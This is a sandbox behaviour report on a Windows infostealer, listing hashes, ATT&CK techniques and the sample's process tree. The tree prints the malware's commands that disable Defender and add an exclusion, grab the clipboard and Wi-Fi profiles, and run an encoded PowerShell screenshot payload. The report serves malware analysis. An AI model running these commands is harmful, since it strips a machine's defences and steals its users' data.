1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d

Analysis

max time kernel
97s
max time network
182s
platform
windows10-1703_x64
resource
win10-20230703-en
resource tags

arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system
submitted
07-07-2023 11:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
Size

7.8MB
MD5

5ade6e0edac7caf4c1913d717009f954
SHA1

6b871b4522ab28435635aeb316b47254c4e20ea7
SHA256

1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d
SHA512

0faabab8ce759201baeb1861be0218fe8e8ae37799b965175916ddec60fd71befcddfadd39e5e7009c455b2dc5be7e9d9a905b2623d15431644bf388a364fd54
SSDEEP

196608:MLwWibT/9eHLz3wIs1zdmLYHSEzOq9WVHUuAG:GibTl03fs1JMYyqOqE

Score

7^/10

spyware stealer upx

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

rar.exe

pid process

3888 rar.exe

pid	process
3888	rar.exe

Loads dropped DLL 19 IoCs

Processes:

1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe

pid	process
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI39842\python311.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI39842\python311.dll	upx
behavioral1/memory/500-193-0x00007FFB44E80000-0x00007FFB45469000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI39842\tinyaes.cp311-win_amd64.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI39842\tinyaes.cp311-win_amd64.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_ctypes.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI39842\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI39842\libffi-8.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI39842\libffi-8.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI39842\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_bz2.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI39842\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_sqlite3.pyd	upx
behavioral1/memory/500-209-0x00007FFB57760000-0x00007FFB57783000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI39842\sqlite3.dll	upx
behavioral1/memory/500-211-0x00007FFB53CA0000-0x00007FFB53CCD000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\_MEI39842\_sqlite3.pyd	upx
behavioral1/memory/500-206-0x00007FFB57ED0000-0x00007FFB57EE0000-memory.dmp	upx
behavioral1/memory/500-212-0x00007FFB57730000-0x00007FFB57749000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\_MEI39842\sqlite3.dll	upx
behavioral1/memory/500-210-0x00007FFB57750000-0x00007FFB5775F000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_socket.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI39842\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI39842\select.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI39842\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_ssl.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI39842\_ssl.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI39842\libcrypto-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI39842\libssl-1_1.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI39842\libssl-1_1.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI39842\libcrypto-1_1.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI39842\libcrypto-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_hashlib.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI39842\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_queue.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI39842\_queue.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI39842\unicodedata.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI39842\unicodedata.pyd	upx
behavioral1/memory/500-231-0x00007FFB53C70000-0x00007FFB53C93000-memory.dmp	upx
behavioral1/memory/500-235-0x00007FFB53C50000-0x00007FFB53C69000-memory.dmp	upx
behavioral1/memory/500-233-0x00007FFB52830000-0x00007FFB529A7000-memory.dmp	upx
behavioral1/memory/500-236-0x00007FFB53C40000-0x00007FFB53C4D000-memory.dmp	upx
behavioral1/memory/500-241-0x00007FFB44B00000-0x00007FFB44E78000-memory.dmp	upx
behavioral1/memory/500-243-0x00007FFB537A0000-0x00007FFB537B4000-memory.dmp	upx
behavioral1/memory/500-245-0x00007FFB524F0000-0x00007FFB5260C000-memory.dmp	upx
behavioral1/memory/500-244-0x00007FFB53C00000-0x00007FFB53C0D000-memory.dmp	upx
behavioral1/memory/500-239-0x00007FFB537C0000-0x00007FFB53878000-memory.dmp	upx
behavioral1/memory/500-237-0x00007FFB53C10000-0x00007FFB53C3E000-memory.dmp	upx
behavioral1/memory/500-570-0x00007FFB44E80000-0x00007FFB45469000-memory.dmp	upx
behavioral1/memory/500-573-0x00007FFB57760000-0x00007FFB57783000-memory.dmp	upx
behavioral1/memory/500-579-0x00007FFB52830000-0x00007FFB529A7000-memory.dmp	upx
behavioral1/memory/500-794-0x00007FFB44E80000-0x00007FFB45469000-memory.dmp	upx
behavioral1/memory/500-861-0x00007FFB44E80000-0x00007FFB45469000-memory.dmp	upx
behavioral1/memory/500-877-0x00007FFB44E80000-0x00007FFB45469000-memory.dmp	upx
behavioral1/memory/500-878-0x00007FFB57ED0000-0x00007FFB57EE0000-memory.dmp	upx
behavioral1/memory/500-879-0x00007FFB57760000-0x00007FFB57783000-memory.dmp	upx
behavioral1/memory/500-880-0x00007FFB57750000-0x00007FFB5775F000-memory.dmp	upx
behavioral1/memory/500-881-0x00007FFB53CA0000-0x00007FFB53CCD000-memory.dmp	upx
behavioral1/memory/500-882-0x00007FFB57730000-0x00007FFB57749000-memory.dmp	upx
behavioral1/memory/500-883-0x00007FFB53C70000-0x00007FFB53C93000-memory.dmp	upx
behavioral1/memory/500-884-0x00007FFB52830000-0x00007FFB529A7000-memory.dmp	upx
behavioral1/memory/500-885-0x00007FFB53C50000-0x00007FFB53C69000-memory.dmp	upx
behavioral1/memory/500-887-0x00007FFB53C10000-0x00007FFB53C3E000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

2140 WMIC.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

3864 tasklist.exe
4876 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

2052 systeminfo.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3972 reg.exe
Runs net.exe

flow	ioc
6	ip-api.com

pid	process
2140	WMIC.exe

pid	process
3864	tasklist.exe
4876	tasklist.exe

pid	process
2052	systeminfo.exe

pid	process
3972	reg.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4104	powershell.exe
4764	powershell.exe
4104	powershell.exe
4104	powershell.exe
3708	powershell.exe
3708	powershell.exe
4764	powershell.exe
4764	powershell.exe
4104	powershell.exe
4504	powershell.exe
4504	powershell.exe
3708	powershell.exe
4764	powershell.exe
4504	powershell.exe
3708	powershell.exe
4504	powershell.exe
4184	powershell.exe
4184	powershell.exe
4184	powershell.exe
1120	powershell.exe
1120	powershell.exe
1120	powershell.exe
516	powershell.exe
516	powershell.exe
516	powershell.exe
1860	powershell.exe
1860	powershell.exe
1860	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exetasklist.exeWMIC.exepowershell.exetasklist.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	3864	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2664	WMIC.exe
Token: SeSecurityPrivilege	2664	WMIC.exe
Token: SeTakeOwnershipPrivilege	2664	WMIC.exe
Token: SeLoadDriverPrivilege	2664	WMIC.exe
Token: SeSystemProfilePrivilege	2664	WMIC.exe
Token: SeSystemtimePrivilege	2664	WMIC.exe
Token: SeProfSingleProcessPrivilege	2664	WMIC.exe
Token: SeIncBasePriorityPrivilege	2664	WMIC.exe
Token: SeCreatePagefilePrivilege	2664	WMIC.exe
Token: SeBackupPrivilege	2664	WMIC.exe
Token: SeRestorePrivilege	2664	WMIC.exe
Token: SeShutdownPrivilege	2664	WMIC.exe
Token: SeDebugPrivilege	2664	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2664	WMIC.exe
Token: SeRemoteShutdownPrivilege	2664	WMIC.exe
Token: SeUndockPrivilege	2664	WMIC.exe
Token: SeManageVolumePrivilege	2664	WMIC.exe
Token: 33	2664	WMIC.exe
Token: 34	2664	WMIC.exe
Token: 35	2664	WMIC.exe
Token: 36	2664	WMIC.exe
Token: SeDebugPrivilege	3708	powershell.exe
Token: SeDebugPrivilege	4876	tasklist.exe
Token: SeDebugPrivilege	4504	powershell.exe
Token: SeIncreaseQuotaPrivilege	2664	WMIC.exe
Token: SeSecurityPrivilege	2664	WMIC.exe
Token: SeTakeOwnershipPrivilege	2664	WMIC.exe
Token: SeLoadDriverPrivilege	2664	WMIC.exe
Token: SeSystemProfilePrivilege	2664	WMIC.exe
Token: SeSystemtimePrivilege	2664	WMIC.exe
Token: SeProfSingleProcessPrivilege	2664	WMIC.exe
Token: SeIncBasePriorityPrivilege	2664	WMIC.exe
Token: SeCreatePagefilePrivilege	2664	WMIC.exe
Token: SeBackupPrivilege	2664	WMIC.exe
Token: SeRestorePrivilege	2664	WMIC.exe
Token: SeShutdownPrivilege	2664	WMIC.exe
Token: SeDebugPrivilege	2664	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2664	WMIC.exe
Token: SeRemoteShutdownPrivilege	2664	WMIC.exe
Token: SeUndockPrivilege	2664	WMIC.exe
Token: SeManageVolumePrivilege	2664	WMIC.exe
Token: 33	2664	WMIC.exe
Token: 34	2664	WMIC.exe
Token: 35	2664	WMIC.exe
Token: 36	2664	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4764	powershell.exe
Token: SeSecurityPrivilege	4764	powershell.exe
Token: SeTakeOwnershipPrivilege	4764	powershell.exe
Token: SeLoadDriverPrivilege	4764	powershell.exe
Token: SeSystemProfilePrivilege	4764	powershell.exe
Token: SeSystemtimePrivilege	4764	powershell.exe
Token: SeProfSingleProcessPrivilege	4764	powershell.exe
Token: SeIncBasePriorityPrivilege	4764	powershell.exe
Token: SeCreatePagefilePrivilege	4764	powershell.exe
Token: SeBackupPrivilege	4764	powershell.exe
Token: SeRestorePrivilege	4764	powershell.exe
Token: SeShutdownPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeSystemEnvironmentPrivilege	4764	powershell.exe
Token: SeRemoteShutdownPrivilege	4764	powershell.exe
Token: SeUndockPrivilege	4764	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.execmd.exenet.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3984 wrote to memory of 500	3984	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
PID 3984 wrote to memory of 500	3984	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
PID 500 wrote to memory of 216	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 216	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 216 wrote to memory of 3440	216	cmd.exe	net.exe
PID 216 wrote to memory of 3440	216	cmd.exe	net.exe
PID 3440 wrote to memory of 4824	3440	net.exe	net1.exe
PID 3440 wrote to memory of 4824	3440	net.exe	net1.exe
PID 500 wrote to memory of 3484	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 3484	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 1888	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 1888	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 1888 wrote to memory of 4104	1888	cmd.exe	powershell.exe
PID 1888 wrote to memory of 4104	1888	cmd.exe	powershell.exe
PID 500 wrote to memory of 3532	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 3532	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 5004	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 5004	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 3484 wrote to memory of 4764	3484	cmd.exe	powershell.exe
PID 3484 wrote to memory of 4764	3484	cmd.exe	powershell.exe
PID 500 wrote to memory of 4328	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 4328	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 5028	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 5028	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 3216	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 3216	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 2472	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 2472	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 4556	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 4556	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 444	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 444	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 3532 wrote to memory of 3864	3532	cmd.exe	tasklist.exe
PID 3532 wrote to memory of 3864	3532	cmd.exe	tasklist.exe
PID 500 wrote to memory of 4360	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 4360	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 5004 wrote to memory of 3972	5004		reg.exe
PID 5004 wrote to memory of 3972	5004		reg.exe
PID 5028 wrote to memory of 3708	5028	cmd.exe	powershell.exe
PID 5028 wrote to memory of 3708	5028	cmd.exe	powershell.exe
PID 4328 wrote to memory of 2664	4328	cmd.exe	WMIC.exe
PID 4328 wrote to memory of 2664	4328	cmd.exe	WMIC.exe
PID 500 wrote to memory of 4780	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 4780	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 444 wrote to memory of 2052	444	cmd.exe	systeminfo.exe
PID 444 wrote to memory of 2052	444	cmd.exe	systeminfo.exe
PID 3216 wrote to memory of 4876	3216	cmd.exe	tasklist.exe
PID 3216 wrote to memory of 4876	3216	cmd.exe	tasklist.exe
PID 2472 wrote to memory of 3364	2472	cmd.exe	tree.com
PID 2472 wrote to memory of 3364	2472	cmd.exe	tree.com
PID 4556 wrote to memory of 1488	4556	cmd.exe	netsh.exe
PID 4556 wrote to memory of 1488	4556	cmd.exe	netsh.exe
PID 4360 wrote to memory of 4504	4360	cmd.exe	powershell.exe
PID 4360 wrote to memory of 4504	4360	cmd.exe	powershell.exe
PID 4780 wrote to memory of 4216	4780	cmd.exe	reg.exe
PID 4780 wrote to memory of 4216	4780	cmd.exe	reg.exe
PID 500 wrote to memory of 8	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 8	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 8 wrote to memory of 4412	8	cmd.exe	tree.com
PID 8 wrote to memory of 4412	8	cmd.exe	tree.com
PID 500 wrote to memory of 1300	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 500 wrote to memory of 1300	500	1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe	cmd.exe
PID 1300 wrote to memory of 5104	1300	cmd.exe	tree.com
PID 1300 wrote to memory of 5104	1300	cmd.exe	tree.com

C:\Users\Admin\AppData\Local\Temp\1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
"C:\Users\Admin\AppData\Local\Temp\1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3984

C:\Users\Admin\AppData\Local\Temp\1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe
"C:\Users\Admin\AppData\Local\Temp\1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "net session"
3⤵
- Suspicious use of WriteProcessMemory
PID:216

C:\Windows\system32\net.exe
net session
4⤵
- Suspicious use of WriteProcessMemory
PID:3440

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
5⤵
PID:4824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe'"
3⤵
- Suspicious use of WriteProcessMemory
PID:3484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1196c0ab10592a87191900cafe69b19e6c44f16252236d9290d5b63747876b4d.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
3⤵
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
- Suspicious use of WriteProcessMemory
PID:3532

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
3⤵
PID:5004

C:\Windows\system32\reg.exe
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
4⤵
- Modifies registry key
PID:3972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
3⤵
- Suspicious use of WriteProcessMemory
PID:5028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
3⤵
- Suspicious use of WriteProcessMemory
PID:4328

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
- Suspicious use of WriteProcessMemory
PID:3216

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
- Suspicious use of WriteProcessMemory
PID:2472

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:3364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
3⤵
- Suspicious use of WriteProcessMemory
PID:4556

C:\Windows\system32\netsh.exe
netsh wlan show profile
4⤵
PID:1488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
3⤵
- Suspicious use of WriteProcessMemory
PID:444

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:2052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAAp